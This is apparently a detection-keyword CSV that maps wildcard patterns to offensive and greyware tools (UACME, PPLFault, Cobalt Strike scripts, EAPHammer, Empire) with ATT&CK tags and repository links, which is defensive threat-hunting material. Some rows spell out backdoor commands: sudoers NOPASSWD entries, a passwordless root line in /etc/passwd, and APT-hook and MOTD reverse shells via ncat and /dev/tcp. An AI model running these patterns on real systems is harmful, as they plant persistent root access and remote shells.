Panda - Chimera - APT29,C2,https://github.com/EspressoCake/PPLDump_BOF,1,1,N/A,10,10,131,24,2021-09-24T07:10:04Z,2021-09-24T07:05:59Z -*DumpShellcode.*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 
- TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,1,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*DumpShellcode.exe*,offensive_tool_keyword,cobaltstrike,Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.,T1055 - T1078.003,TA0002 - TA0006,N/A,N/A,Credential Access,https://github.com/trustedsec/PPLFaultDumpBOF,1,1,N/A,N/A,2,115,11,2023-05-17T12:57:20Z,2023-05-16T13:02:22Z -*DumpShellcode\*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,0,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*DumpSMSAPassword*,offensive_tool_keyword,BloodHound,an adversary with local admin access to an AD-joined computer can dump the cleartext password from LSA secrets of any sMSAs installed on this computer,T1003.001 - T1078 - T1558.002,TA0006 - TA0004 - TA0003,N/A,N/A,AD Enumeration,https://github.com/BloodHoundAD/BloodHound,1,1,N/A,10,10,8799,1624,2023-10-03T06:49:04Z,2016-04-17T18:36:14Z -*dumpVaultCredentials.py*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*dumpXor.exe *,offensive_tool_keyword,cobaltstrike,dump lsass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/seventeenman/CallBackDump,1,0,N/A,10,10,510,74,2023-07-20T09:03:33Z,2022-09-25T08:29:14Z -*-e --enumerate google*github*k8s --github-only-org --k8s-get-secret-values --gcp-get-secret-values*,offensive_tool_keyword,PurplePanda,This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. 
Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.,T1595 - T1078 - T1583 - T1087 - T1526,TA0003 - TA0004 - TA0007 - TA0040,N/A,N/A,Exploitation tools,https://github.com/carlospolop/PurplePanda,1,0,N/A,N/A,6,569,80,2023-08-07T04:13:59Z,2022-01-01T12:10:40Z -*-e ZQBjAGgAbwAgAEcAbwBkACAAQgBsAGUAcwBzACAAWQBvAHUAIQA=*,offensive_tool_keyword,SharpNoPSExec,Get file less command execution for lateral movement.,T1021.006 - T1059.003 - T1105,TA0008 - TA0002 - TA0011,N/A,N/A,Lateral Movement,https://github.com/juliourena/SharpNoPSExec,1,0,N/A,10,6,567,85,2022-06-03T10:32:55Z,2021-04-24T22:02:38Z -*E09F4899-D8B3-4282-9E3A-B20EE9A3D463*,offensive_tool_keyword,AMSI_patch,Patching AmsiOpenSession by forcing an error branching,T1055 - T1055.001 - T1112,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/AMSI_patch,1,0,N/A,8,2,126,27,2023-08-02T02:27:00Z,2023-02-03T18:11:37Z -*e0be14373098896893f34e02dfe84d3eb64e11d9d9f7f70a15101b41cf9ae5bd*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*E11DC25D-E96D-495D-8968-1BA09C95B673*,offensive_tool_keyword,SilentMoonwalk,PoC Implementation of a fully dynamic call stack spoofer,T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/klezVirus/SilentMoonwalk,1,0,N/A,9,6,507,84,2022-12-08T10:01:41Z,2022-12-04T13:30:33Z -*e1cd2b55-3b4f-41bd-a168-40db41e34349*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,0,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z 
-*e1ff2208b3786cac801ffb470b9475fbb3ced74eb503bfde7aa7f22af113989d*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*E2E64E89-8ACE-4AA1-9340-8E987F5F142F*,offensive_tool_keyword,Amsi-Killer,Lifetime AMSI bypass,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Amsi-Killer,1,0,N/A,10,5,493,77,2023-09-26T00:49:22Z,2023-02-26T19:05:14Z -*e333ccfe9c22eab91abd3ca224c70741e8619bb00353ea3bc4ea9d9f007cdf85*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z 
-*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*e3f9f33e0223371b74d1ce7049a52675ea7a7086f1901b753db3cd9c187246b2*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*E54195F0-060C-4B24-98F2-AD9FB5351045*,offensive_tool_keyword,POSTDump,perform minidump of LSASS process using few technics to avoid detection.,T1003.001 - T1055 - T1564.001,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/YOLOP0wn/POSTDump,1,0,N/A,10,2,172,21,2023-09-15T11:24:50Z,2023-09-13T11:28:51Z -*e54acaf84b54afaa2320803e0928ce9fbc19d8be3e8df4051b88f1b19cd836a5*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*e56e67b10a67f0d5ef4128c7ab0c6cb9ba9966916720525edfa6abf3101dfe13*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation 
tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*e67d285ac080ed3a22453a79f4390dfb1b5b131569aa53a2cd2502c4b5a69221*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*e6b96e43c3a1a8de682f16086ea8639cfe4649092fc2f47e26fb5baa42a70caf*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*e732850b9f1b5432e5e75ac1ff4312f65e283ee9833b45b390633ea21a99b94a*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*e7cb9e5eaca549d918f5f048f55cf67c46e745aeccebc578eb848e46c1915719*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*E82BCAD1-0D2B-4E95-B382-933CF78A8128*,offensive_tool_keyword,LsassSilentProcessExit,Command line interface to dump LSASS memory to disk via SilentProcessExit,T1003.001 - T1059.003,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/deepinstinct/LsassSilentProcessExit,1,0,N/A,10,5,421,64,2020-12-23T11:51:21Z,2020-11-29T08:49:42Z -*E991E6A7-31EA-42E3-A471-90F0090E3AFD*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 
- MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,0,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*e99aa4997bda14b534c614c3d8cb78a72c4aca91a1212c8b03ec605d1d75e36e*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*ea23a31a0ec1fa3ae2ff1a0bad75421cbd8d74bcfbb7abd2749eb625c918b518*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*eaphammer -i eth0 --channel 4 --auth wpa-eap --essid * --creds*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*eaphammer*,offensive_tool_keyword,EAPHammer,EAPHammer is a toolkit for performing targeted evil twin attacks against WPA2-Enterprise networks. It is designed to be used in full scope wireless assessments and red team engagements. As such. focus is placed on providing an easy-to-use interface that can be leveraged to execute powerful wireless attacks with minimal manual configuration. To illustrate just how fast this tool is. 
our Quick Start section provides an example of how to execute a credential stealing evil twin attack against a WPA/2-EAP network in just commands,T1553 - T1560 - T1569 - T1590 - T1591,TA0002 - TA0007,N/A,N/A,Network Exploitation tools,https://github.com/s0lst1c3/eaphammer,1,0,N/A,N/A,10,1825,296,2023-09-17T10:13:21Z,2017-02-04T01:03:39Z -*eapmd5tojohn*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*easinvoker.exe*System32*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,0,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*EasyHook-Managed*InjectionLoader.cs*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,1,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*EasyHook-Managed*WOW64Bypass.*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,1,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*EasyHook-Managed/LocalHook.cs*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation 
tools,https://github.com/FuzzySecurity/Dendrobate,1,1,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*EasyPersistent.cna*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,1,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*Ebowla-master.zip*,offensive_tool_keyword,Ebowla,Framework for Making Environmental Keyed Payloads,T1027.002 - T1059.003 - T1140,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Genetic-Malware/Ebowla,1,1,N/A,10,8,710,179,2019-01-28T10:45:15Z,2016-04-07T22:29:58Z -*echo * .bash_history*,greyware_tool_keyword,bash,Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.,T1070.004 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense 
Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*echo * /home/*/.bash_history*,greyware_tool_keyword,bash,Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.,T1070.004 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*echo * /root/.bash_history*,greyware_tool_keyword,bash,Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.,T1070.004 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*echo * > \\.\pipe\*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Get-System.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*echo * ALL=(ALL) NOPASSWD: ALL* >>/etc/sudoers*,greyware_tool_keyword,sudoers,use SUDO without password,T1548.002 - T1059.004 - T1078.004,TA0004 - TA0002 - TA0005,N/A,N/A,Persistence,N/A,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*echo * ALL=NOPASSWD: /bin/bash* >>/etc/sudoers*,greyware_tool_keyword,sudoers,use SUDO without password,T1548.002 - T1059.004 - T1078.004,TA0004 - TA0002 - TA0005,N/A,N/A,Persistence,N/A,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*echo *%sudo ALL=(ALL) NOPASSWD: ALL* >> /etc/sudoers*,greyware_tool_keyword,sudo,Sudo Persistence via sudoers file,T1078 - T1166,TA0003,N/A,N/A,Persistence,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*echo */24 | dnsx -silent -resp-only 
-ptr*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*echo *::0:0::/root:/bin/bash* >>/etc/passwd*,greyware_tool_keyword,bash,add a passwordless user ,T1136.001 - T1059.004 - T1078.004,TA0005 - TA0002 - TA0004,N/A,N/A,Persistence,N/A,1,0,N/A,8,8,N/A,N/A,N/A,N/A -*echo *APT::Update::Pre-Invoke *nohup ncat -lvp * -e /bin/bash * > /etc/apt/apt.conf.d/*,greyware_tool_keyword,bash,Backdooring APT,T1059.004 - T1574.001 - T1027,TA0002 - TA0005,N/A,N/A,Persistence,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*echo *bailing. try a different name\*,greyware_tool_keyword,tmpwatch,Equation Group hack tool set command exploitation- tmpwatch - removes files which haven't been accessed for a period of time,T1070.004 - T1059 - T1047,TA0007 - TA0002 - TA0040,N/A,N/A,N/A,https://linux.die.net/man/8/tmpwatch,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*echo *bash -c *bash -i >& /dev/tcp/*/* >> /etc/update-motd.d/00-header*,greyware_tool_keyword,bash,Backdooring Message of the Day,T1059.004 - T1574.001 - T1027,TA0002 - TA0005,N/A,N/A,Persistence,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*echo [.ShellClassInfo] > desktop.ini*,greyware_tool_keyword,attrib,NTLM Leak via Desktop.ini,T1555.003 - T1081.001,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*echo 123 > c:\windows\temp\test.txt*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - 
TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*echo '8.8.8.8' | hakrevdns*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*echo IconResource=\\*\* >> desktop.ini*,greyware_tool_keyword,attrib,NTLM Leak via Desktop.ini,T1555.003 - T1081.001,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*echo -n 'cmd /c start rundll32 *.dll* | base64*,offensive_tool_keyword,AD exploitation cheat sheet,Generate EncodedCommand,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*echo nc -l -p * > *.bat*,greyware_tool_keyword,nc,Netcat Realy on windows - create a relay that sends packets from the local port to a netcat client connecte to the target ip on the targeted port,T1090.001 - T1021.001,TA0011 - TA0040,N/A,N/A,Network Exploitation Tools,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*echo 'PEzor!!*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*echoac-poc-main*,offensive_tool_keyword,echoac-poc,poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/kite03/echoac-poc,1,1,N/A,8,2,118,25,2023-08-03T04:09:38Z,2023-06-28T00:52:22Z -*echowrecker*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file echowrecker. samba 2.2 and 3.0.2a - 3.0.12-5 RCE (with DWARF symbols) for FreeBSD OpenBSD 3.1 OpenBSD 3.2 (with a non-executable stack zomg) and Linux. Likely CVE-2003-0201. 
There is also a Solaris version,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/x0rz/EQGRP/blob/master/Linux/bin/echowrecker,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z
-*ecryptfs2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
